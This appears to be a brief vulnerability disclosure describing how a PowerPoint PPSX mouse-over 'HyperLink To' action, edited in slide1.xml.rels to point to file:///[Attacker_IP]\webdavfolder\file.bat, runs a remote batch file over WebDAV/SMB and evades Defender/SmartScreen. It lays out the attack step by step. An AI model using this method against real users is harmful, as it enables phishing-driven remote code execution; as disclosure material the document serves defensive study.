-
In Powerpoint it is possible to set an action on a mouse over or mouse click
-
We can set a file to be executed and this was exploited by attackers in 2017 where a particular powershell command could be run
-
Since that vulnerability was patched, this one is an extension to it where instead of using "Run Program" action we use "HyperLink To" action and set it to a "Other file"
-
Then we can select a file within the system.
-
Save the Powerpoint file as PPSX or PPS
-
Then open the PPSX file using a ZIP program and change the value in "\ppt\slides_rels\slide1.xml.rels" of rID which is connected to your mouse over event to "file:///[Attacker_IP]\webdavfolder\file.bat"
-
Due to the way SMB connections work in Windows 10, SMB connections over Internet are possible even if SMB ports (445/139) are closed if a webserver supporting WEBDAV extension is hosted by an attacker
-
Now hover over your the text and observe that user just needs to acccept the pop-ups and this allows the program to be executed
-
Combined with social engineering this attack would work completely.
-
The attack is able to bypass the Powerpoint's restriction of not being able to add a remote file to the HyperLink action which if we try to add using the GUI, we will see Powerpoint complaining about it
-
Also if a HTTP/HTTPS url is linked with the hyperlink action, then the OS would download the file using a browser on the system at which point Windows Defender/Smartscreen would kick in indicating that it is an untrusted file and even if we hit 'Run', it will quartine the file, so an attacker can bypass that using this method
-
MSRC was contacted about the vulnerability, but they decided to ignore it and stated that since it requires social engineering attack, they are not willing to fix it